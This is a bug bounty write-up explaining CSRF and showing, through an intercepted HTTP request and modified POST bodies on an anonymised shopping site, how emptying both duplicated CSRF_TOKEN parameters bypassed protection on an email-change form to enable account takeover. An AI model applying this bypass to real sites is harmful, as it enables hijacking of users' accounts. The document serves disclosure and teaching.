
Account takeover CSRF Misconfiguration

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests such as transferring funds or changing their email address. If the victim is an administrative account, CSRF can compromise the entire web application.

Case Study

As this was a private program, all illustrations of the vulnerability use example.com as the host.

Since this was a shopping site, I started by playing with the price parameter to get items for free, but that failed. The program was two years old and already had around 100 reports, so I assumed the account section would not be vulnerable. Still, under the My Account page there is an option to change the email address without entering the password, which looked promising: an email change without a password check can end in account takeover via CSRF. As soon as I intercepted the request, though, I saw that the POST request carried CSRF protection.

POST /customer/account/edit/ HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://www.examplecom.au/customer/account/details/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 262
Connection: close
Cookie:

CSRF_TOKEN=e7a943c34fdfgffaf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=e7a943c34fe5dd8b177faf90e69f464401aa276f

So I started testing for CSRF. First I emptied the value of the CSRF token, something like:

CSRF_TOKEN=e7a943c3dfgdfd8b177faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=

That ended in an error. Next I removed the CSRF_TOKEN parameter completely, so the body looked like this:

CSRF_TOKEN=e7a943cgfsfgh177faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com

Again an error. After about ten minutes of testing I noticed that CSRF_TOKEN is sent twice in the request, once at the start of the body and once at the end:

CSRF_TOKEN=e7a943c34fdfgfdg77faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=e7a943c34fe5dd8b177faf90e69f464401aa276f

I emptied both CSRF_TOKEN values, giving a POST body like:

CSRF_TOKEN=&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=

The request succeeded. With the token check bypassed, a forged request could change any logged-in user's email address, and I was able to take over anyone's account.

Reported: 12 March 2020
Responded: 15 March 2020
Rewarded: $XXX, 24 April 2020

3 replies on “Account takeover CSRF Misconfiguration”

Hi Wisdomfreak,

Just for my understanding, when you wrote "I removed both the CSRF_TOKEN", the POST information is 7a943c34fdfgfdg77faf90e69f464401aa276f, isn't it?

I would like to try; I want to start bug bounty and I want to learn.

In the POST request, as mentioned, there are two CSRF_TOKEN parameters: one at the beginning of the POST body and one at the end. To make it work I needed to remove both CSRF_TOKEN values.
